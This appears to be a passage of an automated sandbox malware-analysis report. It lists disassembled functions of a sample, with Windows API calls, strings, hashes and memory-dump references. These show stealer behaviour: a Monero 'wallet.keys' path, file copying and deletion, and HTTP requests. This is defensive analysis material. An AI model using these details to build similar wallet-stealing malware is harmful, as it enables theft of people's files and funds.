Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: $"$"$------$------$------$P$`$de-DE$
API String ID: 874700897-1177263951
Opcode ID: baeac027b15b2d99f8de013fe69c9411826eaa8b85da16d502e97d402dfe65f0
Instruction ID: f3a01733a51d69218903531717563ea5f3e561473957bd13dbafa13cb02cea5e
Opcode Fuzzy Hash: baeac027b15b2d99f8de013fe69c9411826eaa8b85da16d502e97d402dfe65f0
Instruction Fuzzy Hash: 55125272820528ABCB16EBA0ED95FEEB378BF14700F40419AF50666191EF702F49DF55

Function 003CA790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003DAA70: StrCmpCA.SHLWAPI(00EB8940,003CA7A7,?,003CA7A7,00EB8940), ref: 003DAA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003CAAC8
RtlAllocateHeap.NTDLL(00000000), ref: 003CAACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 003CABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003CA8B0

Part of subcall function 003DA820: lstrlen.KERNEL32(003C4F05,?,?,003C4F05,003E0DDE), ref: 003DA82B
Part of subcall function 003DA820: lstrcpy.KERNEL32(003E0DDE,00000000), ref: 003DA885

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

lstrcat.KERNEL32(?,00000000), ref: 003CACEB
lstrcat.KERNEL32(?,003E1320), ref: 003CACFA
lstrcat.KERNEL32(?,00000000), ref: 003CAD0D
lstrcat.KERNEL32(?,003E1324), ref: 003CAD1C
lstrcat.KERNEL32(?,00000000), ref: 003CAD2F
lstrcat.KERNEL32(?,003E1328), ref: 003CAD3E
lstrcat.KERNEL32(?,00000000), ref: 003CAD51
lstrcat.KERNEL32(?,003E132C), ref: 003CAD60
lstrcat.KERNEL32(?,00000000), ref: 003CAD73
lstrcat.KERNEL32(?,003E1330), ref: 003CAD82
lstrcat.KERNEL32(?,00000000), ref: 003CAD95
lstrcat.KERNEL32(?,003E1334), ref: 003CADA4
lstrcat.KERNEL32(?,00000000), ref: 003CADB7
lstrlen.KERNEL32(?), ref: 003CAE0D
lstrlen.KERNEL32(?), ref: 003CAE1C

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

DeleteFileA.KERNEL32(00000000), ref: 003CAE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 003CABD4

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: 37943df3ae26acba8331450e58de80f1d26303e183c09f1ff844cc59e05796a4
Instruction ID: da4e13f4bdf56642ea2144760d7bbde29e662ef684d10bfedee9500c80cbc893
Opcode Fuzzy Hash: 37943df3ae26acba8331450e58de80f1d26303e183c09f1ff844cc59e05796a4
Instruction Fuzzy Hash: 951287729106189BCB06FBE0EE96EEE7779BF14300F404119F507AA191EF31AE05DB62

Function 003C4880 Relevance: 35.5, APIs: 11, Strings: 9, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003C4839
Part of subcall function 003C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003C4849

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003C4915
StrCmpCA.SHLWAPI(?,00EBE4E0), ref: 003C493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003C4ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,003E0DDB,00000000,?,?,00000000,?,",00000000,?,00EBE5B0), ref: 003C4DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003C4E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003C4E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003C4E49
InternetCloseHandle.WININET(00000000), ref: 003C4EAD
InternetCloseHandle.WININET(00000000), ref: 003C4EC5
HttpOpenRequestA.WININET(00000000,00EBE560,?,00EBDAF0,00000000,00000000,00400100,00000000), ref: 003C4B15

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

InternetCloseHandle.WININET(00000000), ref: 003C4ECF

Strings

", xrefs: 003C4BF2
, xrefs: 003C492F
------, xrefs: 003C4B28
", xrefs: 003C4D33
------, xrefs: 003C4C69
P, xrefs: 003C4BC9
de-DE, xrefs: 003C4AE5
`, xrefs: 003C4B07
------, xrefs: 003C49BD

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------$P$`$de-DE$
API String ID: 460715078-1118744451
Opcode ID: 55407c281d5e26975ea6754c7f5ccf86abf34b1da75b30226c626ac2a853234b
Instruction ID: 3a2f43ce425692cb8b2eb5891ce14c1d5f799064d4f521dec3c66e1b39e7ec5c
Opcode Fuzzy Hash: 55407c281d5e26975ea6754c7f5ccf86abf34b1da75b30226c626ac2a853234b
Instruction Fuzzy Hash: 9B1281729106189ACB16EB90EDA2FEEB738BF14300F50419AF40676191EF702F49DF62

Function 003CCEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003D8B60: GetSystemTime.KERNEL32(003E0E1A,00EB9CC8,003E05AE,?,?,003C13F9,?,0000001A,003E0E1A,00000000,?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003D8B86

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003CCF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003CD0C7
RtlAllocateHeap.NTDLL(00000000), ref: 003CD0CE
lstrcat.KERNEL32(?,00000000), ref: 003CD208
lstrcat.KERNEL32(?,003E1478), ref: 003CD217
lstrcat.KERNEL32(?,00000000), ref: 003CD22A
lstrcat.KERNEL32(?,003E147C), ref: 003CD239
lstrcat.KERNEL32(?,00000000), ref: 003CD24C
lstrcat.KERNEL32(?,003E1480), ref: 003CD25B
lstrcat.KERNEL32(?,00000000), ref: 003CD26E
lstrcat.KERNEL32(?,003E1484), ref: 003CD27D
lstrcat.KERNEL32(?,00000000), ref: 003CD290
lstrcat.KERNEL32(?,003E1488), ref: 003CD29F
lstrcat.KERNEL32(?,00000000), ref: 003CD2B2
lstrcat.KERNEL32(?,003E148C), ref: 003CD2C1
lstrcat.KERNEL32(?,00000000), ref: 003CD2D4
lstrcat.KERNEL32(?,003E1490), ref: 003CD2E3

Part of subcall function 003DA820: lstrlen.KERNEL32(003C4F05,?,?,003C4F05,003E0DDE), ref: 003DA82B
Part of subcall function 003DA820: lstrcpy.KERNEL32(003E0DDE,00000000), ref: 003DA885

lstrlen.KERNEL32(?), ref: 003CD32A
lstrlen.KERNEL32(?), ref: 003CD339

Part of subcall function 003DAA70: StrCmpCA.SHLWAPI(00EB8940,003CA7A7,?,003CA7A7,00EB8940), ref: 003DAA8F

DeleteFileA.KERNEL32(00000000), ref: 003CD3B4

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 2a6721db4f2c83c6fbb7d656d8460adde172c0bf845329151c1d475bcd0d1cb4
Instruction ID: d9df66872a2b94d641785b1f0b940c14afe321bf3a7edc1430149c3cf5684c47
Opcode Fuzzy Hash: 2a6721db4f2c83c6fbb7d656d8460adde172c0bf845329151c1d475bcd0d1cb4
Instruction Fuzzy Hash: 21E184729502089BCB06EBE0EE96EEE7779BF14300F004159F507AB291DF35AE05DB62

Function 003C6280 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003C4839
Part of subcall function 003C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003C4849

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

InternetOpenA.WININET(003E0DFE,00000001,00000000,00000000,00000000), ref: 003C62E1
StrCmpCA.SHLWAPI(?,00EBE4E0), ref: 003C6303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003C6335
HttpOpenRequestA.WININET(00000000,GET,?,00EBDAF0,00000000,00000000,00400100,00000000), ref: 003C6385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003C63BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003C63D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003C63FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003C646D
InternetCloseHandle.WININET(00000000), ref: 003C64EF
InternetCloseHandle.WININET(00000000), ref: 003C64F9
InternetCloseHandle.WININET(00000000), ref: 003C6503

Strings

, xrefs: 003C62F8
ERROR, xrefs: 003C64C9
de-DE, xrefs: 003C635A
ERROR, xrefs: 003C6407
GET, xrefs: 003C637C

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET$de-DE$
API String ID: 3749127164-12451867
Opcode ID: 0b71c4f796657ea0047f894e2902b20f05f18470109ffca70ada36720a6085e4
Instruction ID: 178084723601a171a4b1703b7e540b2932c91489d59b1da581b7dd3a0210be27
Opcode Fuzzy Hash: 0b71c4f796657ea0047f894e2902b20f05f18470109ffca70ada36720a6085e4
Instruction Fuzzy Hash: CF716C71A40318ABDB15DBE0DC5AFEE7778BB44700F108199F50AAB290DBB46E85CF51

Function 003D5510 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA820: lstrlen.KERNEL32(003C4F05,?,?,003C4F05,003E0DDE), ref: 003DA82B
Part of subcall function 003DA820: lstrcpy.KERNEL32(003E0DDE,00000000), ref: 003DA885

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003D5644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003D56A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003D5857

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003D51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003D5228

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003D52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003D5318
Part of subcall function 003D52C0: lstrlen.KERNEL32(00000000), ref: 003D532F
Part of subcall function 003D52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 003D5364
Part of subcall function 003D52C0: lstrlen.KERNEL32(00000000), ref: 003D5383
Part of subcall function 003D52C0: lstrlen.KERNEL32(00000000), ref: 003D53AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003D578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003D5940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003D5A0C
Sleep.KERNEL32(0000EA60), ref: 003D5A1B

Strings

@i, xrefs: 003D5585, 003D55E3
ERROR, xrefs: 003D5849
ERROR, xrefs: 003D5636
ERROR, xrefs: 003D59FE
ERROR, xrefs: 003D577D
ERROR, xrefs: 003D5693
ERROR, xrefs: 003D5932

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
